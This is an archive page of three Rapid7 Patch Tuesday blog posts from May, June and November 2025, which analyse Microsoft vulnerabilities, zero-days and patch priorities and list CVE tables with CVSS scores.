Tag Archives: Vulnerability management

Patch Tuesday – November 2025

2025-11-11 Adam Barnett

Post Syndicated from Adam Barnett original https://www.rapid7.com/blog/post/em-patch-tuesday-november-2025

Microsoft is publishing 66 new vulnerabilities today, which is far fewer than we’ve come to expect in recent months. There’s a lone exploited-in-the-wild zero-day vulnerability, which Microsoft assesses as critical severity, although there’s apparently no public disclosure yet. Three critical remote code execution (RCE) vulnerabilities are patched today; happily, Microsoft currently assesses all three as less likely to see exploitation. Five browser vulnerabilities and a dozen or so fixes for Azure Linux (aka Mariner) have already been published separately this month, and are not included in the total.

Windows GDI+: critical 0-day RCE

Faced with a fresh stack of Patch Tuesday vulns, there are a few different ways to prioritize our analysis. Do we start with vulns exploited in the wild? Pre-authentication RCEs? The vuln with the highest CVSS base score? The vuln which is likely to affect just about every asset running Microsoft software? Any of these are sensible avenues of approach, and today, all roads lead to CVE-2025-60724. As the advisory notes, in the worst-case scenario, an attacker could exploit this vulnerability by uploading a malicious document to a vulnerable web service. The advisory doesn’t spell out the context of code execution, but if all the stars align for the attacker, the prize could be remote code execution as SYSTEM via the network without any need for an existing foothold. While this vuln almost certainly isn’t wormable, it’s clearly very serious and is surely a top priority for just about anyone considering how to approach this month’s patches.

The weakness underlying CVE-2025-60724 is CWE-122: Heap-based buffer overflow, a concept which celebrated its 50th birthday several years ago. As the authors of the original 1972 paper noted: “If the code makes use of an internal buffer, there is a possibility that a user could input enough data to overwrite other portions of the program’s private storage.” Regarding computer security in general, they opined that “this problem is neither hopeless nor solved. It is, however, perfectly clear […] that solutions to the problem will not occur spontaneously, nor will they come from the various well-intentioned attempts to provide security as an add-on to existing systems.”

Office: critical ACE

Once again, we find ourselves wondering: “when is remote code execution really remote?” CVE-2025-62199 describes a critical RCE vulnerability in Microsoft Office, where exploitation relies on the user downloading and opening a malicious file. The attacker is remote, and that’s enough to satisfy the definition, even if the action is taken on the local system by the unwitting user. Anyone hoping that the Preview Pane is not a vector will be sadly disappointed, and this certainly increases the probability of real-world exploitation, since there’s no need for the attacker to craft a way around those pesky warnings about enabling dangerous content. Just scrolling through a list of emails in Outlook could be enough.

Visual Studio: critical RCE

Some attacks are straightforward, with only a single step needed to reach the finish line. Others, like Visual Studio critical RCE CVE-2025-62214, require that the attacker execute a complex chain of events. In this case, exploitation demands multi-stage abuse of recent advances in Visual Studio AI development capabilities, including prompt injection, Agent interaction, and triggering a build. The advisory doesn’t describe the context of code execution. If the prize is simply code execution on an asset in the context of the user, there’s no obvious advancement for the attacker, since exploitation already requires code execution on the asset by the attacker or the targeted user. The brief description of the attack chain does mention that the attacker would need to trigger a build. On that basis, possible outcomes might include execution in an elevated context, or compromised build artifacts, although the advisory does not provide enough information to be certain either way.

SQL Server: critical EoP

SQL Server admins should take note of CVE-2025-59499, which describes an elevation of privilege (EoP) vulnerability. Although some level existing privileges are required, successful exploitation will permit an attacker to run arbitrary Transact-SQL (T-SQL) commands. T-SQL is the language which SQL Server databases and clients use to communicate with one another. Although the default configuration for SQL Server disables the xp_cmdshell functionality which allows direct callouts to the underlying OS, there’s more than one way to shine a penny, and the only safe assumption here is that exploitation will lead to code execution in the context of SQL Server itself. Patches are available for all supported versions of SQL Server.

Microsoft lifecycle update

Following the sweeping lifecycle changes seen in October 2025, Microsoft is taking it fairly easy this month. The only significant transition today is the end of support for Windows 11 Home and Pro 23H2. Unlike the demise of Windows 10, this much smaller change won’t affect most people; a small number of older CPUs might not make the cut, since Windows 11 24H2 introduces a requirement for a couple of newer CPU instruction sets. Microsoft provides lists of compatible Intel, AMD, and Qualcomm CPU series.

Summary charts

A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Nov

A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Nov

A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Nov

Summary tables

Azure vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-59504	Azure Monitor Agent Remote Code Execution Vulnerability	No	No	7.3

Browser vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-12729	Chromium: CVE-2025-12729 Inappropriate implementation in Omnibox	No	No	N/A
CVE-2025-12728	Chromium: CVE-2025-12728 Inappropriate implementation in Omnibox	No	No	N/A
CVE-2025-12727	Chromium: CVE-2025-12727 Inappropriate implementation in V8	No	No	N/A
CVE-2025-12726	Chromium: CVE-2025-12726 Inappropriate implementation in Views.	No	No	N/A
CVE-2025-12725	Chromium: CVE-2025-12725 Out of bounds write in WebGPU	No	No	N/A

Developer Tools vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-62222	Agentic AI and Visual Studio Code Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-62449	Microsoft Visual Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability	No	No	6.8
CVE-2025-62214	Visual Studio Remote Code Execution Vulnerability	No	No	6.7
CVE-2025-62453	GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability	No	No	5

Mariner Open Source Software vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2024-25621	containerd affected by a local privilege escalation via wide permissions on CRI directory	No	No	7.3
CVE-2025-10966	missing SFTP host verification with wolfSSH	No	No	6.8
CVE-2025-64329	containerd CRI server: Host memory exhaustion through Attach goroutine leak	No	No	N/A

Microsoft Dynamics vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-62210	Dynamics 365 Field Service (online) Spoofing Vulnerability	No	No	8.7
CVE-2025-62211	Dynamics 365 Field Service (online) Spoofing Vulnerability	No	No	8.7
CVE-2025-62206	Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability	No	No	6.5

Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-62204	Microsoft SharePoint Remote Code Execution Vulnerability	No	No	8
CVE-2025-62199	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-62216	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-62205	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-60727	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-62200	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-62201	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-62203	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-60726	Microsoft Excel Information Disclosure Vulnerability	No	No	7.1
CVE-2025-62202	Microsoft Excel Information Disclosure Vulnerability	No	No	7.1
CVE-2025-60722	Microsoft OneDrive for Android Elevation of Privilege Vulnerability	No	No	6.5
CVE-2025-59240	Microsoft Excel Information Disclosure Vulnerability	No	No	5.5
CVE-2025-60728	Microsoft Excel Information Disclosure Vulnerability	No	No	4.3

Open Source Software vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-62220	Windows Subsystem for Linux GUI Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-12863	Libxml2: namespace use-after-free in xmlsettreedoc() function of libxml2	No	No	7.5
CVE-2025-64433	KubeVirt Arbitrary Container File Read	No	No	6.5
CVE-2025-40107	can: hi311x: fix null pointer dereference when resuming from sleep before interface was enabled	No	No	5.5
CVE-2025-60753	An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).	No	No	5.5
CVE-2025-12875	mruby array.c ary_fill_exec out-of-bounds write	No	No	5.3
CVE-2025-64435	KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation	No	No	5.3
CVE-2025-64437	KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes	No	No	5
CVE-2025-64434	KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing	No	No	4.7
CVE-2025-64432	KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer	No	No	4.7
CVE-2025-40109	crypto: rng – Ensure set_ent is always present	No	No	4.2
CVE-2025-52881	runc: LSM labels can be bypassed with malicious config using dummy procfs files	No	No	N/A
CVE-2025-31133	runc container escape via “masked path” abuse due to mount race conditions	No	No	N/A
CVE-2025-52565	container escape due to /dev/console mount and related races	No	No	N/A
CVE-2025-64436	KubeVirt Excessive Role Permissions Could Enable Unauthorized VMI Migrations Between Nodes	No	No	N/A

Other vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-30398	Nuance PowerScribe 360 Information Disclosure Vulnerability	No	No	8.1

SQL Server vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-59499	Microsoft SQL Server Elevation of Privilege Vulnerability	No	No	8.8

System Center vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-47179	Configuration Manager Elevation of Privilege Vulnerability	No	No	6.7

Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-59511	Windows WLAN Service Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60713	Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60718	Windows Administrator Protection Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60721	Windows Administrator Protection Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60707	Multimedia Class Scheduler Service (MMCSS) Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60710	Host Process for Windows Tasks Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-59507	Windows Speech Runtime Elevation of Privilege Vulnerability	No	No	7
CVE-2025-59508	Windows Speech Recognition Elevation of Privilege Vulnerability	No	No	7
CVE-2025-62215	Windows Kernel Elevation of Privilege Vulnerability	Yes	No	7
CVE-2025-59515	Windows Broadcast DVR User Service Elevation of Privilege Vulnerability	No	No	7
CVE-2025-60717	Windows Broadcast DVR User Service Elevation of Privilege Vulnerability	No	No	7
CVE-2025-62218	Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability	No	No	7
CVE-2025-62219	Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability	No	No	7
CVE-2025-60716	DirectX Graphics Kernel Elevation of Privilege Vulnerability	No	No	7
CVE-2025-60708	Storvsp.sys Driver Denial of Service Vulnerability	No	No	6.5
CVE-2025-60723	DirectX Graphics Kernel Denial of Service Vulnerability	No	No	6.3
CVE-2025-59509	Windows Speech Recognition Information Disclosure Vulnerability	No	No	5.5
CVE-2025-62208	Windows License Manager Information Disclosure Vulnerability	No	No	5.5
CVE-2025-62209	Windows License Manager Information Disclosure Vulnerability	No	No	5.5
CVE-2025-60706	Windows Hyper-V Information Disclosure Vulnerability	No	No	5.5
CVE-2025-60724	GDI+ Remote Code Execution Vulnerability	Yes	No	9.8

Windows ESU vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-62452	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8
CVE-2025-60715	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8
CVE-2025-60720	Windows Transport Driver Interface (TDI) Translation Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-59505	Windows Smart Card Reader Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60703	Windows Remote Desktop Services Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60714	Windows OLE Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-60709	Windows Common Log File System Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60705	Windows Client-Side Caching Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-59514	Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-59512	Customer Experience Improvement Program (CEIP) Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-60704	Windows Kerberos Elevation of Privilege Vulnerability	No	No	7.5
CVE-2025-60719	Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability	No	No	7
CVE-2025-62217	Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability	No	No	7
CVE-2025-62213	Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability	No	No	7
CVE-2025-59506	DirectX Graphics Kernel Elevation of Privilege Vulnerability	No	No	7
CVE-2025-59510	Windows Routing and Remote Access Service (RRAS) Denial of Service Vulnerability	No	No	5.5
CVE-2025-59513	Windows Bluetooth RFCOM Protocol Driver Information Disclosure Vulnerability	No	No	5.5
CVE-2025-60724	GDI+ Remote Code Execution Vulnerability	Yes	No	9.8

Windows Microsoft Office ESU vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-60724	GDI+ Remote Code Execution Vulnerability	No	No	9.8

Updates

2025-11-11: clarified the description of CVE-2025-62214.

Patch Tuesday – June 2025

2025-06-10 Adam Barnett

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/06/10/patch-tuesday-june-2025/

Patch Tuesday - June 2025

Microsoft is addressing 67 vulnerabilities this June 2025 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation for just one of the vulnerabilities published today, and that is reflected in CISA KEV. Separately, Microsoft is aware of existing public disclosure for one other freshly published vulnerability. Microsoft’s luck holds for a ninth consecutive Patch Tuesday, since neither of today’s zero-day vulnerabilities are evaluated as critical severity at time of publication. Today also sees the publication of eight critical remote code execution (RCE) vulnerabilities. Two browser vulnerabilities have already been published separately this month, and are not included in the total.

Windows WebDAV: zero-day RCE

Remember the WebDAV standard? It has been seven years since Microsoft has published a vulnerability in the Windows implementation of WebDAV, and today’s publication of CVE-2025-33053 is the first zero-day vulnerability on record. Originally dreamed up in the 1990s to support interactivity on the web, WebDAV may be familiar to Exchange admins and users of a certain vintage, since older versions of Exchange, up to and including Exchange Server 2010, supported WebDAV as a means for interacting with mailboxes and public folders.

It will surprise no one that Windows still more or less supports WebDAV, and that turns out to be a bit of a problem. Microsoft acknowledges Check Point Research (CPR) on the advisory; CPR in turn attributes exploitation of CVE-2025-33053 to an APT, which they track as Stealth Falcon, an established threat actor with a long-running interest in governments and government-adjacent entities across the Middle East and the surrounding area.

Curiously, the Microsoft advisory does not mention that the Windows implementation of WebDAV is listed as deprecated since November 2023, which in practical terms means that the WebClient service no longer starts by default. The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control. Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2. On Server 2025, for instance, it’s still possible to install the WebDAV Redirector server feature, which then causes the WebClient service to appear.

SMB client: zero-day EoP

Publicly disclosed elevation of privilege (EoP) zero-day vulnerabilities that lead to SYSTEM are always going to be worth a closer look, and CVE-2025-33073 is no exception. The advisory sets out that the easiest path to exploitation simply requires the user to connect to a malicious SMB server controlled by the attacker. It’s not entirely clear from the advisory whether simply connecting is enough to trigger exploitation, or whether successful authentication is required, since there is currently conflicting language in two separate FAQ entries with almost-identical titles: “How could an attacker exploit this/the vulnerability?” It may well be that Microsoft will come back around and clarify this wording, but in the meantime the only safe assumption is that fortune favours the attacker.

Windows KDC Proxy: critical RCE

The Windows KDC Proxy Service (KPSSVC) receives a patch today for CVE-2025-33071, which describes a critical unauthenticated RCE vulnerability where exploitation is via abuse of a cryptographic protocol weakness. The good news is that only Windows Server assets configured as a Kerberos Key Distribution Center Proxy Protocol server — happily, this is not enabled as standard configuration for a domain controller — and exploitation requires that the attacker win a race condition. The bad news is that Microsoft considers exploitation more likely regardless, and since a KDC proxy helps Kerberos requests from untrusted networks more easily access trusted assets without any need for a direct TCP connection from the client to the domain controller, the trade-off here is that the KDC proxy itself is quite likely to be exposed to an untrusted network. Patching this vulnerability should be top of mind for affected defenders this month.

Office preview pane: trio of critical RCEs

Microsoft expects that exploitation of three Office critical RCE vulns patched today is more likely. CVE-2025-47162, CVE-2025-47164, and CVE-2025-47167 share several attributes: each was discovered by prolific researcher 0x140ce, who topped the MSRC 2025 Q1 leaderboard, and each includes the Preview Pane as a vector, which always ups the ante for defenders. Admins responsible for installations of Microsoft 365 Apps for Enterprise — also confusingly referred to as “Microsoft 365 for Office” in the advisory FAQ — will have to hang on, since patches for today’s vulnerabilities aren’t yet available for that particular facet of the Microsoft 365 kaleidoscope.

Microsoft lifecycle update

June is a quiet month for Microsoft product lifecycle changes. The next batch of significant Microsoft product lifecycle status changes are due in July 2025, when the SQL Server 2012 ESU program draws to a close, along with support for Visual Studio 2022 17.8 LTSC.

Summary charts

Azure vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-47977	Nuance Digital Engagement Platform Spoofing Vulnerability	No	No	7.6

Browser vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-5419	Chromium: CVE-2025-5419 Out of bounds read and write in V8	No	No	N/A
CVE-2025-5068	Chromium: CVE-2025-5068 Use after free in Blink	No	No	N/A

Developer Tools vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-47962	Windows SDK Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-30399	.NET and Visual Studio Remote Code Execution Vulnerability	No	No	7.5
CVE-2025-47959	Visual Studio Remote Code Execution Vulnerability	No	No	7.1

Microsoft Dynamics vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-47966	Power Automate Elevation of Privilege Vulnerability	No	No	9.8

Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-47172	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-47163	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-47166	Microsoft SharePoint Server Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-47957	Microsoft Word Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-47162	Microsoft Office Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-47953	Microsoft Office Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-47164	Microsoft Office Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-47167	Microsoft Office Remote Code Execution Vulnerability	No	No	8.4
CVE-2025-47168	Microsoft Word Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-47169	Microsoft Word Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-47170	Microsoft Word Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-47175	Microsoft PowerPoint Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-47176	Microsoft Outlook Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-47173	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-47165	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-47174	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-47968	Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-47171	Microsoft Outlook Remote Code Execution Vulnerability	No	No	6.7

Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-33067	Windows Task Scheduler Elevation of Privilege Vulnerability	No	No	8.4
CVE-2025-29828	Windows Schannel Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-32725	DHCP Server Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-33050	DHCP Server Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-32721	Windows Recovery Driver Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-32719	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33058	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33059	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33061	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33062	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33063	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33065	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-24068	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-24069	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-24065	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33055	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-47956	Windows Security App Spoofing Vulnerability	No	No	5.5
CVE-2025-33052	Windows DWM Core Library Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33069	Windows App Control for Business Security Feature Bypass Vulnerability	No	No	5.1
CVE-2025-47969	Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability	No	No	4.4

Windows ESU vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-33073	Windows SMB Client Elevation of Privilege Vulnerability	No	Yes	8.8
CVE-2025-33064	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-33066	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-33053	Web Distributed Authoring and Versioning (WEBDAV) Remote Code Execution Vulnerability	Yes	No	8.8
CVE-2025-32710	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-33070	Windows Netlogon Elevation of Privilege Vulnerability	No	No	8.1
CVE-2025-33071	Windows KDC Proxy Service (KPSSVC) Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-32718	Windows SMB Client Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-47955	Windows Remote Access Connection Manager Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-32716	Windows Media Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-32714	Windows Installer Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-33075	Windows Installer Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-32713	Windows Common Log File System Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-32712	Win32k Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-33068	Windows Standards-Based Storage Management Service Denial of Service Vulnerability	No	No	7.5
CVE-2025-33056	Windows Local Security Authority (LSA) Denial of Service Vulnerability	No	No	7.5
CVE-2025-32724	Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability	No	No	7.5
CVE-2025-3052	Cert CC: CVE-2025-3052 InsydeH2O Secure Boot Bypass	No	No	6.7
CVE-2025-33057	Windows Local Security Authority (LSA) Denial of Service Vulnerability	No	No	6.5
CVE-2025-32715	Remote Desktop Protocol Client Information Disclosure Vulnerability	No	No	6.5
CVE-2025-32722	Windows Storage Port Driver Information Disclosure Vulnerability	No	No	5.5
CVE-2025-32720	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-33060	Windows Storage Management Provider Information Disclosure Vulnerability	No	No	5.5
CVE-2025-47160	Windows Shortcut Files Security Feature Bypass Vulnerability	No	No	5.4

Patch Tuesday – May 2025

2025-05-13 Adam Barnett

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/05/13/patch-tuesday-may-2025/

Patch Tuesday - May 2025

Microsoft is addressing 77 vulnerabilities this May 2025 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation for five of the vulnerabilities published today, and these are already reflected in CISA KEV. Separately, Microsoft is aware of existing public disclosure for two vulnerabilities published today. This is now the eight consecutive Patch Tuesday on which Microsoft has published zero-day vulnerabilities without evaluating any of them as critical severity at time of publication. Today also sees the publication of six critical remote code execution (RCE) vulnerabilities. Six browser vulnerabilities have already been published separately this month, and are not included in the total.

Windows Scripting Engine: zero-day RCE

In the majority of cases, the CVSSv3 base score provides a solid sense of the severity of a vulnerability. Sometimes, however, even a correct CVSS assessment can disguise the potential impact of a specific vulnerability. This arguably the case with CVE-2025-30397, a zero-day RCE vulnerability in the Windows Scripting Engine with a healthy but unremarkable CVSSv3 base score of 7.5. Microsoft is aware of exploitation in the wild. It’s certainly not the worst of the worst — we save that level of alarm for pre-authentication RCE with no requirement for user interaction — and Microsoft assesses attack complexity as high, which is arguably correct. And yet…

The advisory FAQ for CVE-2025-30397 explains that successful exploitation requires an attacker to first prepare the target so that it uses Edge in Internet Explorer Mode, and then causes the user to click a malicious link; there is no mention of a requirement for the user to actively reload the page in Internet Explorer Mode, so we must assume that exploitation requires only that the “Allow sites to be reloaded in Internet Explorer” option is enabled. Users who are most likely to require Internet Explorer compatibility mode in 2025 are surely users at enterprise organizations, where critical business workflows still depend on applications from the dinosaur days when Internet Explorer ruled the roost. No doubt the concept of a plan for migration of all of these applications exists, buried several layers deep in a dusty backlog, but Microsoft would hardly be offering IE compatibility mode until at least 2029 if it didn’t know that a huge swathe of its customer base demands it.

If the pre-requisite conditions are already conveniently in place on the target asset thanks to a well-meaning corporate IT policy, attack complexity is suddenly nice and low. If this vulnerability didn’t have that requirement for environment preparation, the CVSS base score would then be 8.8, which is as close to critical as you can get without actually stepping over the line. As Rapid7 has previously noted on a number of occasions, the MSHTML/Trident scripting engine is still present in Windows; this is true even for assets which have only ever run versions of Windows released well after the end of support for Internet Explorer 11 back in June 2022.

Common Log File System: zero-day EoPs

Neither CVE-2025-32701 nor CVE-2025-32706 are the first zero-day vulnerabilities in the Windows Common Log File Driver System; indeed, they are the latest members of an ongoing dynasty where exploitation typically leads to elevation of privilege to SYSTEM. Credit where credit is due: recent disclosures by Microsoft’s own Threat Intelligence Center (MSTIC), including this month’s CVE-2025-32701, demonstrate that Microsoft is putting serious effort into detecting and rooting out CLFS exploitation. Of course, since Microsoft is aware of exploitation in the wild, we know that someone else got there first, and there’s no reason to suspect that threat actors will stop looking for ways to abuse CLFS any time soon.

Windows Desktop Window Manager: zero-day EoP

If proof were needed that elevation of privilege to SYSTEM will never go out of style, today sees the publication of CVE-2025-30400, which is a zero-day vulnerability in the Windows Desktop Window Manager (DWM). As it happens, tomorrow marks the one-year anniversary of CVE-2024-30051, a previous zero-day EoP vulnerability in DWM.

Visual Studio: zero-day RCE

Today, all current versions of Visual Studio 2022 and 2019 receive patches for CVE-2025-32702, a zero-day RCE where exploitation requires the user to download and open a malicious file. There is nothing obviously remarkable about this, although Microsoft is aware of public disclosure. As usual for a malicious file/link vuln, the word Remote here refers to the location of the attacker, even though exploitation is set in motion by local user action.

Ancillary Function Driver for Winsock: zero-day EoP

Regular Patch Tuesday watchers will recognize the Ancillary Function Driver for Winsock, which is the site of CVE-2025-32709, an elevation of privilege vulnerability for which Microsoft is aware of exploitation. In something of a break with tradition for Patch Tuesday zero-day EoP vulnerabilities, exploitation only leads to administrator privileges rather than all the way to SYSTEM, but no attacker is going to waste too many cycles feeling sad about that.

Defender for Identity: situationally-ironic zero-day spoofing

Today sees the publication of CVE-2025-26685, a zero-day spoofing vulnerability in Microsoft Defender for Identity. The advisory provides puzzle pieces which don’t by themselves add up to anything like a full explanation of the vulnerability; no action is required for remediation, but you can render yourself vulnerable if you insist by opening a case with Microsoft Support to re-enable the legacy NTLM authentication method.

However, the FAQ does offer a link to an article published yesterday: Configure SAM-R to enable lateral movement path detection in Microsoft Defender for Identity. This solid piece of documentation is part of the overall Defender for Identity administration guide, and explains that the lateral movement path detection feature can itself potentially be exploited by an adversary to obtain an NTLM hash.

Exploitation relies on achieving fallback from Kerberos to NTLM; the compromised credentials in this case would be those of the Directory Service Account for Defender for Identity. The new Defender for Identity sensor (version 3.x) is not affected by this issue as it uses different detection methods; at time of writing, the Defender for Identity What’s new? page doesn’t yet describe the 3.x release, but this will presumably receive an update soon.

Microsoft lifecycle update

The next batch of significant Microsoft product lifecycle status changes are due in July 2025, when SQL Server 2012 ESU program draws to a close, along with support for Visual Studio 2022 17.8 LTSC.

Summary charts

Summary tables

Apps vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29975	Microsoft PC Manager Elevation of Privilege Vulnerability	No	No	7.8

Azure vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29972	Azure Storage Resource Provider Spoofing Vulnerability	No	No	9.9
CVE-2025-29827	Azure Automation Elevation of Privilege Vulnerability	No	No	9.9
CVE-2025-30387	Document Intelligence Studio On-Prem Elevation of Privilege Vulnerability	No	No	9.8
CVE-2025-47733	Microsoft Power Apps Information Disclosure Vulnerability	No	No	9.1
CVE-2025-33072	Microsoft msagsfeedback.azurewebsites.net Information Disclosure Vulnerability	No	No	8.1
CVE-2025-29973	Microsoft Azure File Sync Elevation of Privilege Vulnerability	No	No	7

Azure Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-27488	Microsoft Windows Hardware Lab Kit (HLK) Elevation of Privilege Vulnerability	No	No	6.7

Browser vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29825	Microsoft Edge (Chromium-based) Spoofing Vulnerability	No	No	6.5
CVE-2025-4372	Chromium: CVE-2025-4372 Use after free in WebAudio	No	No	N/A
CVE-2025-4096	Chromium: CVE-2025-4096 Heap buffer overflow in HTML	No	No	N/A
CVE-2025-4052	Chromium: CVE-2025-4052 Inappropriate implementation in DevTools	No	No	N/A
CVE-2025-4051	Chromium: CVE-2025-4051 Insufficient data validation in DevTools	No	No	N/A
